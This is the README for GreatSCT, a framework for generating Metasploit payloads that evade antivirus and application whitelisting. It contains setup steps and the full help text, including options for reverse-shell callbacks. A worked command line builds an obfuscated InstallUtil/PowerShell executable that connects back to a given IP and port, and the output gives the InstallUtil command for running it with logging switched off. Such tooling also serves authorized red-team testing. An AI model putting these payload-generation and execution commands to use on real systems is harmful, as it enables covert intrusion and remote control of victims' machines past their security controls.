GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.
GreatSCT is current under support by @ConsciousHacker
Software Requirements:
Linux
- Kali - run the setup script - sudo ./setup.sh -c
NOTE: Support for distributions other than Kali Linux will be coming soon.
Setup (tl;dr)
NOTE: Installation must be done with superuser privileges. If you are not using Kali Linux, prepend each command with
sudo
or change to the root user before beginning.
Run ./setup.sh -c
on Linux.
Install by cloning from git, not via apt!
Quick Install
apt-get -y install git git clone https://github.com/GreatSCT/GreatSCT.git cd GreatSCT/ cd setup sudo ./setup.sh -c
Regenerating Config
NOTE: This must be done with superuser privileges. If you are not using Kali Linux, prepend each command with
sudo
or change to the root user before beginning.
Most of the time the config file at /etc/greatsct/settings.py
will not need to be rebuilt but in some cases you might be prompted to do so. The file is generated by config/update.py
.
It is important that you are in the config/ directory before executing update.py. If you are not, settings.py will be incorrect and when you launch GreatSCT you will see the following.
Main Menu 0 payloads loaded
Don't panic. Enter the config/ dir and re-run update.py.
Example Usage
GreatSCT's Main Menu:
GreatSCT | [Version]: 1.0
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
Main Menu
1 tools loaded
Available Commands:
exit Exit GreatSCT
info Information on a specific tool
list List available tools
update Update GreatSCT
use Use a specific tool
Main menu choice:
Help
usage: GreatSCT.py [--update] [--version] [--list-tools] [-t Bypass] [--ip IP]
[--port Port] [--list-payloads]
[-c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]]
[-o OUTPUT NAME] [-p [PAYLOAD]] [--clean]
[--msfoptions [OPTION=value [OPTION=value ...]]]
[--msfvenom [windows/meterpreter/reverse_tcp]]
GreatSCT is a framework to generate application whitelisting bypasses.
GreatSCT Options:
--update Update the GreatSCT framework.
--version Displays version and quits.
--list-tools List GreatSCT's tools
-t Bypass, --tool Bypass
Specify GreatSCT tool to use (Bypass)
Callback Settings:
--ip IP, --domain IP IP Address to connect back to
--port Port Port number to connect to.
[*] Payload Settings:
--list-payloads Lists all available payloads for that tool
Great Scott Options:
-c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]
Custom payload module options.
-o OUTPUT NAME Output file base name for source and compiled
binaries.
-p [PAYLOAD] Payload to generate. Lists payloads if none specified.
--clean Clean out payload folders.
--msfoptions [OPTION=value [OPTION=value ...]]
Options for the specified metasploit payload.
--msfvenom [windows/meterpreter/reverse_tcp]
Metasploit shellcode to generate.
GreatSCT Bypass CLI
# ./GreatSCT.py --ip 192.168.157.136 --port 443 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"
===============================================================================
Great Scott!
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
[*] Language: installutil_powershell
[*] Payload Module: installutil/powershell/script
[*] Executable written to: /usr/share/greatsct-output/compiled/payload4.exe
[*] Source code written to: /usr/share/greatsct-output/source/payload4.cs
[*] Execute with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload4.exe
#
# file /usr/share/greatsct-output/compiled/payload4.exe
/usr/share/greatsct-output/compiled/payload4.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
#
Credits
https://github.com/veil-Framework/
Licensing
This project is licensed under the GNU General Public License v3 license.